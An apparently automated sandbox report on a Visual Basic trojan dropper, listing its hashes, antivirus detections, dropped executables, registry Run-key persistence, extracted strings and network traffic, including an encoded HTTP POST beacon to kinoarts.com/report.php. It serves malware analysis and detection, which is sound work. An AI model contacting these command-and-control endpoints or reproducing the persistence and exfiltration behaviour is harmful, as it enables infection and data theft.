Analysis Date2018-04-13 12:24:17
MD5bea8f8c202d70fac40d0145fc4c85b63
SHA1be63625e572ea5ff6366868064624f35d8ee30d6

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 8c59a08b4c6e0e55bc5ec03c75d4b3ed sha1: aa20b0c9b12a110401810c9ab4c5ba34c1220f92 size: 32768
Section.data md5: 620f0b67a91f7f74151bc5be745b7110 sha1: 1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d size: 4096
Section.rsrc md5: 62b530860cdb269310b63e7e4cb61847 sha1: d6f2240c27548b5f1d019311b2dbda9c0f6eb2a4 size: 4096
Timestamp2009-05-23 19:44:53
VersionInternalName: stub
FileVersion: 1.00
CompanyName: Xeus Technologies
ProductName:
ProductVersion: 1.00
OriginalFilename: stub.exe
PackerMicrosoft Visual Basic v5.0
PEhash7feb753e1343393cdbecc2d6bd798e5a82755037
IMPhash96dc1ed7ec57421531b136eb65c8d3fb
AVArcabit (arcavir)Gen:Trojan.Heur.VB.om3@dCFXQHai
AVAuthentiumW32/Vbinder.C.gen!Eldorado
AVGrisoft (avg)Generic13.BQAJ
AVAvira (antivir)TR/Dropper.Gen
AVAlwil (avast)VB-OER [Drp]
AVAd-AwareGen:Trojan.Heur.VB.om3@dCFXQHai
AVBitDefenderGen:Trojan.Heur.VB.om3@dCFXQHai
AVBullGuardGen:Trojan.Heur.VB.om3@dCFXQHai
AVClamAVError Scanning File
AVDr. WebTrojan.Packed.2545
AVEmsisoftError Scanning File
AVMicroWorld (escan)Gen:Trojan.Heur.VB.om3@dCFXQHai
AVCA (E-Trust Ino)Error Scanning File
AVFortinetW32/VBDrpr.AFL!tr
AVFrisk (f-prot)W32/Vbinder.C.gen!Eldorado
AVF-SecureGen:Trojan.Heur.VB.om3@dCFXQHai
AVIkarusError Scanning File
AVK7Backdoor ( 04c527251 )
AVKasperskyTrojan-Dropper.Win32.VB.afel
AVMalwareBytesHackTool.Agent.ZSU
AVMcafeeGeneric VB.i
AVMicrosoft Security EssentialsTrojanDropper:Win32/VB
AVNANOTrojan.Win32.VB.jkzp
AVEset (nod32)Win32/TrojanDropper.VB.AFEL
AVPadvishNo Virus
AVCAT (quickheal)No Virus
AVRisingError Scanning File
AV360 SafeNo Virus
AVSUPERAntiSpywareTrojan.Agent/Gen-Dropper
AVSymantecNo Virus
AVTrend MicroNo Virus
AVTwisterTrojan.EA777A7241987A724.mg
AVVirusBlokAda (vba32)OScope.Trojan.VB.01776
AVWindows DefenderTrojanDropper:Win32/VB
AVZillya!No Virus

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\be63625e572ea5ff6366868064624f35d8ee30d6.exe

Creates FileC:\Users\Phil\AppData\Local\Temp\~DF3BBCA5A1D3292DD6.TMP
Creates FileC:\Users\Phil\AppData\Local\Temp\be63625e572ea5ff6366868064624f35d8ee30d6.exe
Creates FileC:\Users\Phil\AppData\Local\Temp\be63625e572ea5ff6366868064624f35d8ee30d6.exe
Creates FileC:\Users\Phil\AppData\Local\Temp\be63625e572ea5ff6366868064624f35d8ee30d6.exe
Creates FileC:\Users\Phil\AppData\Local\Temp\dzbiunc.exe
Creates FileC:\Users\Phil\AppData\Local\Temp\znvrjrt.exe
Creates FileC:\Users\Phil\AppData\Local\owhj.vbs
Creates FileC:\
Creates FileC:\Users\desktop.ini
Creates FileC:\Users
Creates FileC:\Users\Phil
Creates FileC:\Users\Phil\Searches\desktop.ini
Creates FileC:\
Creates FileC:\Users
Creates FileC:\Users\Phil
Creates FileC:\Users\Phil\Videos\desktop.ini
Creates FileC:\
Creates FileC:\Users
Creates FileC:\Users\Phil
Creates FileC:\Users\Phil\Pictures\desktop.ini
Creates FileC:\
Creates FileC:\Users
Creates FileC:\Users\Phil
Creates FileC:\Users\Phil\Desktop\desktop.ini
Creates FileC:\
Creates FileC:\Users
Creates FileC:\Users\Phil
Creates FileC:\Users\Phil\Contacts\desktop.ini
Creates FileC:\
Creates FileC:\Users
Creates FileC:\Users\Phil
Creates FileC:\Users\Phil\Favorites\desktop.ini
Creates FileC:\
Creates FileC:\Users
Creates FileC:\Users\Phil
Creates FileC:\Users\Phil\Music\desktop.ini
Creates FileC:\
Creates FileC:\Users
Creates FileC:\Users\Phil
Creates FileC:\Users\Phil\Downloads\desktop.ini
Creates FileC:\
Creates FileC:\Users
Creates FileC:\Users\Phil
Creates FileC:\Users\Phil\Documents\desktop.ini
Creates FileC:\
Creates FileC:\Users
Creates FileC:\Users\Phil
Creates FileC:\Users\Phil\Links\desktop.ini
Creates FileC:\
Creates FileC:\Users
Creates FileC:\Users\Phil
Creates FileC:\Users\Phil\Saved Games\desktop.ini
Creates FileC:\
Creates FileC:\Users
Creates FileC:\Users\Phil\AppData\Local\owhj.vbs
Creates FileC:\Users\Phil\AppData\Local\owhj.vbs
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ikgqv ➝
C:/Users/Phil/AppData/Local/Temp//dzbiunc.exe
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\srowj ➝
C:/Users/Phil/AppData/Local/Temp//znvrjrt.exe
Creates Mutex
Creates Mutex

Process
↳ C:\Users\Phil\AppData\Local\Temp\dzbiunc.exe

Creates FileC:\Windows\System32\spool\PRTPROCS\x64\9CC7.tmp
Creates FileC:\Windows\System32\spool\PRTPROCS\x64\9CC7.tmp
Creates FileC:\Users\Phil\AppData\Local\Temp\9E8E.tmp

Process
↳ C:\Users\Phil\AppData\Local\Temp\znvrjrt.exe

Creates FileC:\Users\Phil\AppData\Local\Temp\znvrjrt.exe
Creates File\??\Nsi
Creates File\DEVICE\NETBT_TCPIP_{7035D925-FEB8-4F15-A864-01A2CAB79F18}
Creates File\DEVICE\NETBT_TCPIP_{846EE342-7039-11DE-9D20-806E6F6E6963}
Creates File\DEVICE\NETBT_TCPIP_{7035D925-FEB8-4F15-A864-01A2CAB79F18}
Creates File\DEVICE\NETBT_TCPIP_{846EE342-7039-11DE-9D20-806E6F6E6963}
Creates File\??\PhysicalDrive0
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝
15000
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\znvrjrt_RASMANCS\EnableFileTracing ➝
0
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\znvrjrt_RASMANCS\EnableConsoleTracing ➝
0
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\znvrjrt_RASMANCS\FileTracingMask ➝
4294901760
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\znvrjrt_RASMANCS\ConsoleTracingMask ➝
4294901760
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\znvrjrt_RASMANCS\MaxFileSize ➝
1048576
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\znvrjrt_RASMANCS\FileDirectory ➝
%windir%\tracing

Process
↳ C:\Windows\SysWOW64\wscript.exe

Creates FileC:\Windows\SysWOW64\wscript.exe
Creates FileC:\Windows\Globalization\Sorting\sortdefault.nls
Creates FileC:\Users\Phil\AppData\Local\owhj.vbs
Creates FileC:\Users\Phil\AppData\Local\owhj.vbs
Creates FileC:\Users\Phil\AppData\Local\owhj.vbs
Creates FileC:\Users\Phil\AppData\Local\owhj.vbs
Creates Mutex
Creates Mutex

Process
↳ C:\Windows\SysWOW64\cmd.exe

Creates File\??\nul
Creates File\??\nul
Creates FileC:\Users\Phil\AppData\Local\Temp\a..bat
Creates FileC:\Users\Phil\AppData\Local\Temp\a..bat
Creates FileC:\Users\Phil\AppData\Local\Temp\a..bat
Creates FileC:\Users\Phil\AppData\Local\Temp\a..bat
Creates File\??\nul
Creates File\??\nul
Creates FileC:\Users\Phil\AppData\Local\Temp\a..bat
Creates FileC:\Users\Phil\AppData\Local\Temp\a..bat
Creates FileC:\Users\Phil\AppData\Local\Temp\a..bat

Network Details:

DNSkinoarts.com
Type: A
192.31.186.4
DNSpetroartsstudio.com
Type: A
DNSgreeartsday.com
Type: A
HTTP POSThttp://kinoarts.com/report.php?data=v26MmjSySdemXz907AUYRrM7Y7/uI9E8OdYISX0iLBsOWQaH2BXayT3wBU3CcFXegcyUv84UKQiBMF4YGmLzbY+RtufRrKX/N/tqtu7rnQ==
User-Agent: wget 3.0
Flows TCP192.168.1.1:1031 ➝ 192.31.186.4:80

Raw Pcap
0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   504f5354 202f7265 706f7274 2e706870   POST /report.php
0x00000010 (00016)   3f646174 613d7632 364d6d6a 53795364   ?data=v26MmjSySd
0x00000020 (00032)   656d587a 39303741 5559514c 4e73624f   emXz907AUYQLNsbO
0x00000030 (00048)   6670494e 592b4f34 52595358 636e666b   fpINY+O4RYSXcnfk
0x00000040 (00064)   68584377 65416842 72646d57 6d764152   hXCweAhBrdmWmvAR
0x00000050 (00080)   2f48646c 4f456873 69523735 35484b67   /HdlOEhsiR755HKg
0x00000060 (00096)   69424d46 3459476d 4c7a6259 2b527475   iBMF4YGmLzbY+Rtu
0x00000070 (00112)   6652724b 582f4e2f 74717475 37726e51   fRrKX/N/tqtu7rnQ
0x00000080 (00128)   3d3d2048 5454502f 312e310d 0a416363   == HTTP/1.1..Acc
0x00000090 (00144)   6570743a 202a2f0d 0a436f6e 74656e74   ept: */..Content
0x000000a0 (00160)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x000000b0 (00176)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x000000c0 (00192)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x000000d0 (00208)   67656e74 3a207767 65742033 2e300d0a   gent: wget 3.0..
0x000000e0 (00224)   486f7374 3a206b69 6e6f6172 74732e63   Host: kinoarts.c
0x000000f0 (00240)   6f6d0d0a 436f6e74 656e742d 4c656e67   om..Content-Leng
0x00000100 (00256)   74683a20 38310d0a 436f6e6e 65637469   th: 81..Connecti
0x00000110 (00272)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000120 (00288)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x00000130 (00304)   6f2d6361 6368650d 0a0d0a64 6174613d   o-cache....data=
0x00000140 (00320)   756a6e54 33324f2f 46397173 4479417a   ujnT32O/F9qsDyAz
0x00000150 (00336)   36566c4d 53373533 502f5834 664d4d78   6VlMS753P/X4fMMx
0x00000160 (00352)   5239304e 43436f33 64553143 4857445a   R90NCCo3dU1CHWDZ
0x00000170 (00368)   30306543 32487932 416c7947 4f31584a   00eC2Hy2AlyGO1XJ
0x00000180 (00384)   325a6242 72737844 6542374c            2ZbBrsxDeB7L


Strings
.9aa:
)''|
040904B0
1.00
>ADJ
@*\AK:\dev\projects\vb6\hotfusion\stub\Hotstub.vbp
CompanyName
!'%CPSm
DllRegisterServer
FfGj
FileVersion
h}uzjvw
InternalName
IO61~y
'$!k
(#'l
&!&l
&#!nnf~
N[WWVR41
)&(o
Open
ophgo
OriginalFilename
(%(ppm|
ProductName
ProductVersion
#)#q
#$&Q
$!%R
rgfinth}xuiu|guf
%&$S
StringFileInfo
stub
stub.exe
'()t
)$)t
Translation
#&#u
$!%v
VarFileInfo
VS_VERSION_INFO
%))w
%%&w
&))x
&#(x
Xeus Technologies
(($z
(%&z
z{hz
" = "$: 
" > "!: 
" ; "!: 
" : "-: 
" ? "-: 
" ? "!: 
" 	 "!: 
$" : "
&" : "<: 
&" : ">: 
%" ; "!: 
	" = "!: 
!0+[$_
" 0 "!: 
00OZ8S
" 0 "9: 
#0o1G5
`0"RCP
;0x't'
" 1 "!: 
)12`8,
" 1 "3: 
" 1 "5: 
1_7BG'
1=HMn]
1WmA12
" 2 "<: 
*" 2 "
'" 2 "3: 
26EexI+>W
2e~/;C
2Hc	G^
2heWs2f} 
2R`RS 
2uC)G52.
2)#]Xo
2YZyP0
," 3 "!: 
" 3 "-: 
" 3 "!: 
{< 3[_
37K<Ri
<>>3FC%
3h>$fa
@3-OU%0
3RTC~]
@3rucC
3w`43+
[3XSH*SO
" 4 "!: 
" 4 "': 
" 4 "+: 
4 "0:0Pg
4.b2%"
4rsiJdJwan2ctE
" 5 "!: 
*" 5 "*: 
*%.5"}
5.1F*{
>52Orwy
%5](h	x0
5Ih SYp
" ? "6: 
6,:9M#A
6];bvn
6]:+c%u=
#	6/>k
`6R s{ (
" ; "7: 
" 7 "!: 
"?@7 %
(" 7 ">: 
7",a-*
7e|DLd_"
.7mt B
(7u!ZA\
-" 8 "=: 
." 8 " : 
" < "8: 
" = "8: 
" 8 ">: 
" 8 "!: 
" 8 "(: 
8++8zWI
&8/gQ.~]i
|8=i	1%\
8J0f4Q6
8[s |}wR
~ 9 ; 
~-9 * 
~,9 = 
~!9 > 
~'9 " 
~"9 . 
~)9 & 
~$9 ' 
~*9 < 
~*9 : 
~*9 " 
~&9 - 
~#9 - 
~#9 : 
~#9 / 
~%9 , 
~	9 = 
" 9 "!: 
~$9 1 
'?9'2:xk
~$9 8 
~ 9 9 
~,9 9 
~!9 9 
~/9 9 
~'9 9 
~(9 9 
~)9 9 
~$9 9 
~&9 9 
~#9 9 
~%9 9 
~+9 9 
~	9 9 
9 9 = 
9 9 9 
!9H*%it
9jfDd!kM
9K"UE%b4
9S*f?w
9"VaRyOO
A# ^~'
A8QeXm@
_adj_fdiv_m16i
_adj_fdiv_m32
_adj_fdiv_m32i
_adj_fdiv_m64
_adj_fdiv_r
_adj_fdivr_m16i
_adj_fdivr_m32
_adj_fdivr_m32i
_adj_fdivr_m64
_adj_fpatan
_adj_fprem
_adj_fprem1
_adj_fptan
a F p!y 
ahECR_F}L
AKq)o'
AkUeI)n
aLDxLMO_
_allmul
 A.PrQsQIJf<?
|b5<{}:
b7q`INN
b9SqSNU
BaSoVe7
bbbbccccbcccb]
b^^bbcrrc]\\\\yynnfcbbggkgffc
 Bc4r;o| 
BdSa9e
bePL2rle
b,fSOg]
$b\}Lu
bOW4g4
+/,!~B+s
b's}TX
c<1cQq
cbbcfgggggggf^
cBe]D?
 c B q 
cC0v7P~
c@ .c*!G
cDoVeqiGd<v`
c!dyTMDLrCc]o!x!
c{E!}`l
@ceQ0P
cfffggkkmkkmkb
cgT]R!nj 	
chRzNU 
_CIatan
_CIcos
_CIexp
_CIlog
_CIsin
_CIsqrt
_CItan
cJImEAUOR
ckAzT0c
CloseHandle
C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
CreateThread
cxU'vcm)G,.
d1hpEE 
d3t-sc
d6:o,Es
`.data
DDDDDD
DDDDDDDDDDDDD@
DDDDDDDDDDDDDDp
ddIuE"f:f
DDiZj?
d&dzV!!
dFD}DFE^D
 d|: g|
dHU\SmEye
d?+IJO
dJ0>N(LeI
DllFunctionCall
;d=R[K
d\r\SvUoC
}D\tgr@aPe
DUbzTC aS
DuLDw`l
d&uqeOT
dWtAd`xAc&uqO
dWuHt%
d$y$mLdMS's}A
E3[)F@
`E"4EQ
eBaHDf
eC	' 7k<
e}*$GAturKc6rkw
ehbxm_Dq N
E}HGI: 5
eIUyR`i=g
E}NK$Hu
}:E]"o
EQB G*
erDWLWi`E
"{E"'RF
ESm{g'
 }EuEiE
eUN@T_P
EVENT_SINK_AddRef
EVENT_SINK_QueryInterface
EVENT_SINK_Release
e=vXOOG
ExitThread
)e=Y2?
E=Y{+^6
^Ez}@M
)f0MX2*
f3ae7W
`/*^f6
FCM6DyD
f|DxD}D7e
{FE{TSl
# FHC3{
f k Z Y 
fLRHV	m
foKpHr6R
Fq/@,y
FreeLibrary
fSxHz1
~F\TzOtM|N
g5I$8oS
g=aYfFW	sE
g#cjxVs.,
GetExitCodeThread
GetProcAddress
GetTempPathA
gffgkmmmmmunmc
"G@Gc<Sh
ggooqquuxxuuwc
gl'<6z
gnIDS``
go9)tA>
gOEgsYZq }
)gR6AJ4
gvTsOyM
gvTuT`
gwUjI'x&-" 
gxrfLxr
GyTZd0 
^<#h7.]
H*8AcJ
"H@b2m
HbDBR-
%HCaYF!d
hi6R1h
_.h>Iw
 H{: J{
hJgpyUeax
HkU0?z9s
h#mKNil
h}NwLUDQX
H}NwLUw
#H QHA
Hv\`vg
hxrbrzr
i=0xXx
	I@=|6
%_Ib okE
iDEjTtDHS
ie70z!
ifX)18GP
ihUgI_NuL
`IOo9d
+'iQ%*
IqYO ]
^iSa|5]
IvV+b\
~<-i}w(
i	xglEsV
IYQM7%2o
JdwBS5
jEkS:n
JEOQPeTy
}#j hL*@
}#j$hL*@
	>jjG`
%j?M]6
J$M^9Q
JN^g2}wYh
$_j OD
J%'Pu"
jrH!wrYuzrpuzr
jv7-7B0
jxrEjxr
j\zO9&<
j z ^ s 
?`K7.^^
k7b`w!j
K9G85109
! `(K)b
K)c:scPq
kernel32
KkH'Tz
`Kof]Cd
kpAnooFO1k}C
KPSue)^
K#R8o*/)[Q
kT|DxD}D
k v U z 
.l(3;l
laE}n4
 leIeReoi?d!
LLLLLLLLLN
l<LvVUL)
LoadLibraryA
LoTkC2u
lqEsT+` huBME
_LsBxL
l ! |w
 lz G5
M:551-#""9
M6xH'e
mEn:g}S
m=fYERS
>{MGUg
mH2N]Wq6
`mH^R?\
mkjc-}
Mkp}*C
mnEv G
MSVBVM60.DLL
mwppimq
mz ! `
<\_<>n
N_1/8X
N.3_&6F
N	`?E,
]=>nn2
NNEzT 
n)O4gG
nqtqM6
nrApNV!e 
n}r$t$i%t$uSu
N"SG&4
`Nt\Xma
>nTybiIeax
nyeew}
 nz: az
O5WxSA
<O/):c
oCqE>`
<oEpUBI`Y
oEzU!h
Ofrb)LH
:okT	u
oooqxx~~z~z~ug
o[R| '
ORclc(
orE@eaw
O-!TO]E7-
OUJ*P 
o}w$e$r%n$mSd
 oy: py
pD|17e|EG
$pD|D7Y|DLdAVBdMd7e
p	jQ#be
@_PP}7
ppearaxthanbqtgiotfq
pqV$xD}
Pr'0	7
p:S++B
Q8A;L_
?Q9q0sX
qDhw[]
=]qH9K:
QKIOIuEzE
Q&}LL9
QN|d:`tOO
q!}NKoAiHg
qqqx~~
q*:Rp?
"Qs>,s_
*QZ`_C
*]!r!4
rAMia"
`r`:aNk
{RBzkC
rCM9CCOTO
r}d$t$i%o$nS
REKN|L.
RFqTqR
RGG]ENDNE
"r|GgOOM
RI?)'''''''' 
RlqAOS
r}M3CQNzO
r}`$n$c%h$
rnyw:	
roI|N0
rpwQJe
rsmvM_Rm E
rsWDR`
r,tYpfg
RuTBH`2
r.v'!~8
rz~QXU
S0'q J
s3g`IOG
S5G/b3-Rb!
;sAehiGrEr*
sAH|MCR
$SAl@cPO1k}C
SCIE+(((((((
s}cVaJcM
S!E=)(&&&&&
 }s;f}D! 
shell32.dll
ShellExecuteA
SHGetSpecialFolderPathA
skR?9*
]s@l+0q4
'smS\IKfI Qm?o
SPDN#m
`Ss7m{C! 
SsLzDrRaS
ST2phVn
sY'Fs>
T4BhE$
t9dRiGefaTsSt
	"tBl]
:t\c3tG
TCID+(((((((
TCvCSYO&
t}d$n$d%e$dS
T{E0AzD
T{e M}1~
tGfpLG!E 
>t{H`gan
!This program cannot be run in DOS mode.
TJE=)(((((((
TJF=+(((((((
T%ma|XU
 Tnt>5
`Tr^-|
 tS'stEFA%aBvHp:2R/
TT:=~zV
tyR@L`B
U0h_c{ic`
UC@333$!
)U}{Cv
udBdUd7e
u`eRCDpWAS
}u$h$e%
UhjaY Y
UK`w_\<N
Um~^ir2?
"UndXoi
U"oiELgSL
uSLWSTmP
UTO)](
>:uU:ou$
U?+w5I
v0K57e|D
v0rZRDJ
V3#>:q
\V5}pbr
VBA6.DLL
__vbaAryCopy
__vbaAryDestruct
__vbaAryMove
__vbaAryUnlock
__vbaAryVar
__vbaBoolErrVar
__vbaChkstk
__vbaErrorOverflow
__vbaExceptHandler
__vbaExitEachAry
__vbaExitProc
__vbaFileClose
__vbaFileOpen
__vbaFileSeek
__vbaForEachAry
__vbaFPException
__vbaFpI2
__vbaFpI4
__vbaFreeObj
__vbaFreeObjList
__vbaFreeStr
__vbaFreeStrList
__vbaFreeVar
__vbaFreeVarList
__vbaGenerateBoundsError
__vbaGet3
__vbaGet4
__vbaHresultCheckObj
__vbaI2ErrVar
__vbaI2I4
__vbaI2Var
__vbaI4Var
__vbaInStr
__vbaInStrVar
__vbaLenBstr
__vbaLenVar
__vbaNew2
__vbaNextEachAry
__vbaObjSetAddref
__vbaOnError
__vbaPrintFile
__vbaPutOwner3
__vbaR8Str
__vbaRedim
__vbaSetSystemError
__vbaStr2Vec
__vbaStrCat
__vbaStrCmp
__vbaStrCopy
__vbaStrI2
__vbaStrMove
__vbaStrR8
__vbaStrToAnsi
__vbaStrToUnicode
__vbaStrVarMove
__vbaStrVarVal
__vbaUbound
__vbaVar2Vec
__vbaVarCat
__vbaVarCopy
__vbaVarDup
__vbaVarMove
__vbaVarSub
__vbaVarTstEq
__vbaVarTstGt
__vbaVarTstNe
__vbaVarVargNofree
<vb'Bh
 v ^E'G
VEi9pD|d
V\GZN.0
v`#&-j!A!
vKL|GGR
[%v'qA:%\V
vr1hzrf
vr];wr
vr@:zr$Fxr
vSob';
vTfo=JSg
VuRgUQLUL
vYEkS2f}a(
vyfrN	H<e}RDC
vyMDC;
WaitForSingleObject
wArEl%C$oSo
%w$aSr
Wb\\p~j&
Wf'5ms
Wg^ n;
WHg8O[
wlIsNUE%d
W}#%LKaAIGo=V
#W&Ogi
w?PFK6
wr0jxr
wr\Txr
wr"Uxr
?wr?|xr
Wto{9@x
WU04_E
wuuummkggf
'Wvd	g
wwwwwwwDDDDDDDGO
wwwwwwwwwwwwwwp
w	Y28j'{
X<2iE;
X8Gp`(!
 ;x]9zx++<
xCu,&M
"xEnE?<:HAgMeUthv2h
/Xo_14D
|XPTMHoE
xrYUxr
xSQDWB
xthanbqtgiotfq
 *x: (x
y ` 0 pE
y^0=Q=
YaKT5l
/yI{R<rwF\-FoK:Hs>/
YKcrd]i
YM%[\i
yr@9zrJ
yr$dzr
yretxr.
yrsnxr*ayr
yrtjxr_Lxrh
yuuwmkg
yxxmmkgg
 = [ Z 
+Z0 f|
`ZaS ;
ZA|\sB
Z:cp(1
zEwEBAx 
Zf05Pp
zI}Md70%
ZLlnaA\
zrtLxr
~zummk